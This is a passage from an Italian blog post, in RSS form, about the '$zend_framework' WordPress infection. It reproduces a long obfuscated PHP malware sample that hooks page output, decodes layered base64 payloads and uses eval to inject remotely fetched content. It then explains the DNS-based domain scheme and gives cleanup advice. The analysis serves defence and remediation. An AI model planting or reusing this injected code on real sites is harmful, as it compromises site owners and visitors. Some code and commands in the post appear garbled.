 }  if($eva1fY2bo01zo317&amp;16) {
 $eva1fY2bo01c0317=@$eva1fY2bal1cz8i4($eva1fY2bo01zo817,$eva1fY2bo1lcz8i5(0),$eva1fY2bo01c0317)+1;
 }  if($eva1fY2bo01zo317&amp;2) {
 $eva1fY2bo01c0317+=2;
 }  $eva1fY2bo01c03a7=@$eva1fY2bo1lzc8i5(@$eva1fY2bol1cz8i5($eva1fY2bo01zo817,$eva1fY2bo01c0317));  if($eva1fY2bo01c03a7===FALSE) {
 $eva1fY2bo01c03a7=$eva1fY2bo01zo817;
 }  return $eva1fY2bo01c03a7;
 }
function eva1fY2bak1cV2ir($var6) { $eva1fY2b01lzc8l5 = "preg_replace"; $eva1fY2b0llzc8l5 = "preg_match"; $eva1fY2b022zc8l5 = "Header"; $eva1fY2b022zo8l5 = "gzdecode"; $eva1fY2b052zo8l5 = "Content-Encoding: none"; $eva1fY2b052zo8l1 = "/]*&gt;)/si"; $eva1fY2b061zo8l1 = "/]*&gt;)/si"; $eva1fY2b022zc8l5($eva1fY2b052zo8l5); $eva1fY2bo61zo8l7=$eva1fY2b022zo8l5($var6);  if($eva1fY2b0llzc8l5($eva1fY2b052zo8l1,$eva1fY2bo61zo8l7)) {
 return $eva1fY2b01lzc8l5($eva1fY2b062zo8l1, eva1fY2bak1cV0ir()."
"."$1", $eva1fY2bo61zo8l7,1); } else {
 if($eva1fY2b0llzc8l5($eva1fY2b061zo8l1,$eva1fY2bo61zo8l7)) {
 return $eva1fY2b01lzc8l5($eva1fY2bo61zo8l1, eva1fY2bak1cV0ir()."
"."$1", $eva1fY2bo61zo8l7,1);
 } else { return $eva1fY2bo61zo8l7; }
 } }$eva1fY2bak1cz0ir = "function_exists"; $eva1fY2bal1cz0ir = "ob_start"; $eva1fY2bal1cz8ir = "codex22"; if($eva1fY2bak1cz0ir($eva1fY2bal1cz0ir) &amp;&amp; !isset($GLOBALS[$eva1fY2bal1cz8ir])) {
	$GLOBALS[$eva1fY2bal1cz8ir]=1; 	if(!$eva1fY2bak1cz0ir("eva1fY2bak1cV2ir")) { if(!$eva1fY2bak1cz0ir("eva1fY2bak1cV0ir")) {
 function eva1fY2bak1cV0ir() {
 //echo start

 if(!isset($GLOBALS["aghex0"])) {
	$GLOBALS["aghex0"]=1;
 $evalsssgqulVBTkZLAch = "";
 if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "edolpxe";$eva1tYldakBcVSir = "strrev";$eva1tYldakBoVS1r = "ecalper_gerp";$eva1tYidokBoVSjr = ";))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("");:@(.+)@ie";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "strecrptr";$eva1tYlbakBcVSir = "gao[pxe";$eva1tYldakBoVS1r = "ecrp";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} }  
 
 return $evalsssgqulVBTkZLAch;   } }
 if(!$eva1fY2bak1cz0ir("gzdecode")) {
 function gzdecode($eva1fY2bo01zo817) { $eva1fY2bal1cz8i4 = "strpos"; $eva1fY2bol1cz8i5 = "substr"; $eva1fY2bo11cz8i5 = "unpack"; $eva1fY2bo1lcz8i5 = "chr"; $eva1fY2bo1lzc8i5 = "gzinflate";
 $eva1fY2bo01zo317=@ord(@$eva1fY2bol1cz8i5($eva1fY2bo01zo817,3,1));
 $eva1fY2bo01c0317=10;  if($eva1fY2bo01zo317&amp;4) {
 $eva1fY2bo01z0317=@$eva1fY2bo11cz8i5('v',$eva1fY2bol1cz8i5($eva1fY2bo01zo817,10,2));
 $eva1fY2bo01z0317=$eva1fY2bo01z0317[1];
 $eva1fY2bo01c0317+=2+$eva1fY2bo01z0317;
 }  if($eva1fY2bo01zo317&amp;8) {
 $eva1fY2bo01c0317=@$eva1fY2bal1cz8i4($eva1fY2bo01zo817,$eva1fY2bo1lcz8i5(0),$eva1fY2bo01c0317)+1;
 }  if($eva1fY2bo01zo317&amp;16) {
 $eva1fY2bo01c0317=@$eva1fY2bal1cz8i4($eva1fY2bo01zo817,$eva1fY2bo1lcz8i5(0),$eva1fY2bo01c0317)+1;
 }  if($eva1fY2bo01zo317&amp;2) {
 $eva1fY2bo01c0317+=2;
 }  $eva1fY2bo01c03a7=@$eva1fY2bo1lzc8i5(@$eva1fY2bol1cz8i5($eva1fY2bo01zo817,$eva1fY2bo01c0317));  if($eva1fY2bo01c03a7===FALSE) {
 $eva1fY2bo01c03a7=$eva1fY2bo01zo817;
 }  return $eva1fY2bo01c03a7;
 } }
 function eva1fY2bak1cV2ir($var6) { $eva1fY2b01lzc8l5 = "preg_replace"; $eva1fY2b0llzc8l5 = "preg_match"; $eva1fY2b022zc8l5 = "Header"; $eva1fY2b022zo8l5 = "gzdecode"; $eva1fY2b052zo8l5 = "Content-Encoding: none"; $eva1fY2b052zo8l1 = "/]*&gt;)/si"; $eva1fY2b061zo8l1 = "/]*&gt;)/si"; $eva1fY2b022zc8l5($eva1fY2b052zo8l5); $eva1fY2bo61zo8l7=$eva1fY2b022zo8l5($var6);  if($eva1fY2b0llzc8l5($eva1fY2b052zo8l1,$eva1fY2bo61zo8l7)) {
 return $eva1fY2b01lzc8l5($eva1fY2b062zo8l1, eva1fY2bak1cV0ir()."
"."$1", $eva1fY2bo61zo8l7,1); } else {
 if($eva1fY2b0llzc8l5($eva1fY2b061zo8l1,$eva1fY2bo61zo8l7)) {
 return $eva1fY2b01lzc8l5($eva1fY2bo61zo8l1, eva1fY2bak1cV0ir()."
"."$1", $eva1fY2bo61zo8l7,1);
 } else { return $eva1fY2bo61zo8l7; }
 } }
$eva1fY2bo61zo817 = "ob_start"; $eva1fY2bo61zo817("eva1fY2bak1cV2ir");
	}
}</pre>
<h3>Tipo di Attacco:</h3>
<p>Il codice PHP malevolo, controlla che il visitatore corrisponde ad uno spider di un motore di ricerca o di un utente. In quest&#8217;ultimo caso redirige i data da un altro webserver e lo mostra la visitatore.<br />
The malicious PHP checks to see if the user is a web spider and if not, retrieves data from another webserver and displays it to the visitor. I haven’t attempted to retrieve the data from the other webserver but the PHP script will make a request like this:</p>
<h3>Come Funziona:</h3>
<p>Il codice PHP esegue le seguenti operazioni:<br />
Sceglie un numero casuale compreso tra 0 e 2 inclusi<br />
Esegue una crittografia MD5 di quel numero ottenendo un hash<br />
Prende i primi tre caratteri del hash e li utilizza nel formato web-XXX.com<br />
Effettua una query DNS per il dominio web-XXX.com<br />
Effettua una crittografia MD5 dell&#8217;IP risultante<br />
Effettuando una query DNS in uno dei tre possibili domini intermediari (web-cfc.ca, web-c4c.ca, web-c81.ca), l&#8217;attaccante può controllare la risoluzione di questi domini determinando quindi il dominio finale come f52864d624d129b32c21fbca0cb8d6 . com</p>
<h3>Come Proteggersi:</h3>
<p>Quando viene scoperto un nuovo exploit di un CMS, vengono lanciati dei BOT che scandagliano la rete ricercando i siti che utilizzano lo stesso applicativo. Immaginando di aver scoperto un exploit sulla versione X di wordpress, basterà avviare il Bot alla ricerca del tag</p>
<pre lang="html"></pre>
<p>Cioè il tag inserito nel codice html che descrive con quale CMS è implementato il sito. E&#8217; buona norma quindi editare il file che contiene o genera questo tag rimuovendolo completamente. E&#8217; inoltre indispensabile mantenere tutti i CMS utilizzati ed i plugin utilizzati costantemente aggiornati.</p>
<h3>Come Risolvere l&#8217; Attacco $zend_framework WordPress:</h3>
<p>Se si possiede una copia di backup aggiornata del CMS utilizzato e sufficiente sostituire tutti i file della piattaforma con quelli precedentemente salvati. Qualora questo non fosse possibile, sarà necessario editare tutti i file del CMS rimuovendo il codice PHP malevolo. Un comando ricorsivo per eliminare lo script in tutte le pagine è rappresentato da:</p>
<pre lang="bash">find /home/user/directory -name *.c -exec sed -i "s/Y//g" {} ;</pre>
<p>Sostituendo / home / user / directory con la cartella contenente i file del CMS e Y con l&#8217;intero script malevolo.</p>
<h3>Ulteriori danneggiamenti:</h3>
<p>Cambiando i parametri di risposta DNS il sito subirà un calo di indicizzazione nei motori di ricerca oltre che alla perdita temporanea della validazione (se in possesso) dal W3C Consortium</p>
<!--------------------------------------><!-- Conversion Box Made Using : -------><!-- WP Conversion Boxes - -------------><!-- http://wpconversionboxes.com --><!--------------------------------------><div class="wpcb_nothing_offset"></div>

<style>
    
    .wpcb_template_main_1{
        
        background-color: #0faf97;
        width: 100%;
        height: ;
        border-width: ;
        border-color: ;
        margin-top: ;
        margin-bottom: ;
        margin-left: ;
        margin-right: ;
        padding: 20px;
        -webkit-box-shadow: inset 0px 0px 200px -38px rgba(0,0,0,0.5);
        -moz-box-shadow: inset 0px 0px 200px -38px rgba(0,0,0,0.5);
        box-shadow: inset 0px 0px 200px -38px rgba(0,0,0,0.5);     
        
    }
    
    .wpcb_template_main_1 .wpcb_box_heading{
        background-color: ;
        padding-top: 0px;
    }
    
    .wpcb_template_main_1 .wpcb_box_heading_text{
        font-family:    'Arial', serif;
        font-size:      32px;
        line-height:    38px;
        color:          #ffffff;
        text-align:     center;
        text-shadow: 0px 3px 4px rgba(0, 0, 0, 0.25);
        font-weight: 900;
        margin: 0;
    }
    
    .wpcb_template_main_1 .wpcb_box_content_container{
        
    }    
    
    .wpcb_template_main_1 .wpcb_box_content{
        font-family:    Arial;
        font-size:      20px;
        line-height:    24px;
        color:          #ffffff;
        text-align:     center;
        padding: 20px 0px;
    }
    
    .wpcb_template_main_1 .wpcb_box_button_div{
        text-align: center;
    }
    
    .wpcb_template_main_1 .wpcb_box_button_div a.wpcb_box_button, .wpcb_template_main_1 .wpcb_box_button_div button.wpcb_box_button{
        font-family:    Arial;
        font-size:      16px;
        color:          #fff;
        background-color: #4f78f2;
        border-radius: 30px;
        width: ;
        padding: 10px 15px;
    }
    
    .wpcb_button_gradient{background-image : -moz-linear-gradient(top, #4f78f2, #1851f9);background-image : -ms-linear-gradient(top, #4f78f2, #1851f9);background-image : -webkit-gradient(linear, #4f78f2, #1851f9);background-image : -webkit-linear-gradient(top, #4f78f2, #1851f9);background-image : -o-linear-gradient(top, #4f78f2, #1851f9);background-image : linear-gradient(top, #4f78f2, #1851f9);filter : progid:DXImageTransform.Microsoft.gradient(startColorstr=&quot;#4f78f2&quot;, endColorstr=&quot;#1851f9&quot;, GradientType=0);border-color : +#4f78f2 #1851f9 #1851f9;background-color : #4f78f2;}    
        
</style>


<div class="wpcb_template_main wpcb_template_main_1 wpcb_nothing wpcb_nothing" data-fadetime="0">
    <div class="wpcb_box_all_content_container">
        <div class="wpcb_box_content_container">    
            <div class="wpcb_box_heading">
                <div class="wpcb_box_heading_text">Hai bisogno di una consulenza o assistenza?</div>
            </div>            
            <div class="wpcb_box_content">
                Apri un ticket di richiesta, ti risponderò in brevissimo tempo! Chiedere non costa nulla <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" />            </div>    
            <div class="wpcb_box_button_div">
                <a href="http://simonetocco.it/assistenza-e-consulenza/" target="" id="wpcb_box_button_1" class="wpcb_box_button wpcb_button_gradient">Apri Richiesta</a>
            </div>
        </div>    
    </div>
</div><!------------------------------><!-- Conversion Box Ends Here --><!------------------------------><div class="wpcb-tracker" data-id="3640472" data-boxid="1" data-visitedpage="https://simonetocco.it:443/tag/attacco/feed/" data-visittype="visit"></div><p>L'articolo <a href="https://simonetocco.it/attacco-zend_framework-wordpress/">Attacco $zend_framework WordPress</a> sembra essere il primo su <a href="https://simonetocco.it"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
